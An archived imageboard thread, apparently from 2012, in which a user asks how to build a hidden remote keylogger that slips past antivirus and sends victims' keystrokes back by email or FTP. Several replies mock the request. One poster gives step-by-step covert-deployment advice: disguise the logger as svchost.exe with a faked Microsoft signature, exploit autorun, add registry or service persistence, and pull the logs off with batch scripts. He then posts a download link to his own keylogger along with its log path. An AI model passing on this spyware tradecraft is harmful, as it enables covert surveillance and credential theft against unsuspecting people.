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2012-10-02 01:46 28003246 Anonymous (gthread.jpg 350x295 28kB)
I need to make a remote keylograr to do the following things: >logs keys of target durhur >sends as text back to me (FTP or email) >opens upon windows login >easily installable by target >windows wont see as threat how do i do this?

1 min later 28003260 Anonymous (hide files.png 800x600 101kB)
dumping from my limited /g/ folder

1 min later 28003263 Anonymous
I choose what is Sub7 for 500 points.

3 min later 28003289 Anonymous (networkcommunicationprotocols.png 5000x3398 1138kB)
note: >tried ardamax >did not work supposedly it was picked up as a trojan

7 min later 28003312 noko lol
program ur own u moron

7 min later 28003319 Anonymous
>>28003263 never heard anything recently about sub7 does it still work and how?

8 min later 28003329 Anonymous
>>28003319 get the source (LEL VISUAL BASIC 6 ENT REPORTING IN) and make your own suited for your OP needs

9 min later 28003335 Anonymous
write your own

10 min later 28003348 Anonymous
>>28003312 what would i have to include in the program? i am a schoolfag computing student so i know close to nothing about this and close to nothing about computers in the first place tbh

11 min later 28003362 Anonymous
>>28003263 the nineties dialed but somebody picked up the phone and the connection was terminated. >>28003319 Most AV will detect the server and a properly configured firewall will prevent connection. That said it has/had far more capability than simple keylogging. >>28003329 Pretty sure it was written in Delphi

12 min later 28003376 Anonymous
Just fucking Google, it's not that hard to make a keylogger that sends information to you via email.

13 min later 28003395 Anonymous
>>28003362 am i right to think a simple keylog signature will not be picked up by an antivirus?

14 min later 28003410 Anonymous
>>28003395 No they won't.

17 min later 28003436 Anonymous
>>28003410 know of any guides i can follow that will meet my kl needs? never been able to do one that opens upon windows login

18 min later 28003448 patachu (DSC02085.jpg 1920x1200 307kB)
i did one from an existing keylogger. i renamed it svchost.exe and used reshacker to make it an "authentic" svchost from microsoft with signature and all. that's easy as fuck. one thing you can trust : a computer will often have autorun enabled, whenever you insert a cd or an usb storage device. batch scripts are easy and can copy any file on a specified directory and register it on startup by a simple regedit command. (hklm/hkcu or as a service, please; don't just place a shortcut to your spying program on the startup folder...) make sure you know where the program logs the info and make a batch to retrieve it too, so everytime you connect a mp3 player, or a camera it will retrieve the logs. . . well, just ensure your thing looks stealth, hidden and comes with a cute thing like, a kawaii moon horse.

19 min later 28003462 Anonymous
torrent perfect keylogger

26 min later 28003567 Anonymous
>>28003448 i dont understand how a .bat file can be integrated with an .exe file >im a schoolfag computing student (retarded)

30 min later 28003604 Anonymous
>>28003567 Then get out you underageB&

31 min later 28003617 Anonymous nigger
>>28003604 >school = underage? >durhur

33 min later 28003639 Anonymous
>>28003448 >i renamed it svchost.exe and used reshacker to make it an "authentic" svchost from microsoft with signature and all. that's easy as fuck. bullshit, post some proof

36 min later 28003662 Anonymous
>>28003348 >hey, tell me how to make a spaceship that gets me to mars >... >i don't know what a screwdriver is, but please tell me how to build that spaceship Then be honest and go fuck yourself. Or educate yourself. Starting anywhere with a random programming tutorial about anything will be enough.

2 hours later 28005644 Anonymous
>>28003662 your meme arrows were pretty much correct now give me a fking source code

3 hours later 28005979 patachu
>>28005644 you don't seem wise and polite enough to take the control of such a simple program. i shall deliver mine and let you play with it, but i am afraid i'd do something stupid there. tell me i'm wrong and you won't stop there, having just a virus/trojan-free keylogger therefore which can't be detected by any AV.

3 hours later 28006107 patachu
>>28005644 these are not meme arrows. never call this so; these are implication marks. http://dl.free.fr/rKeQNovDi password for starting the download : yiff this program writes to %documents and settings%all_users/application_data/KeyLog.txt and just displays an invisible thing on the tray. you are required to know how to hide tray icons, how to copy a program to windows/system and make sure it opens as startup or as a service.

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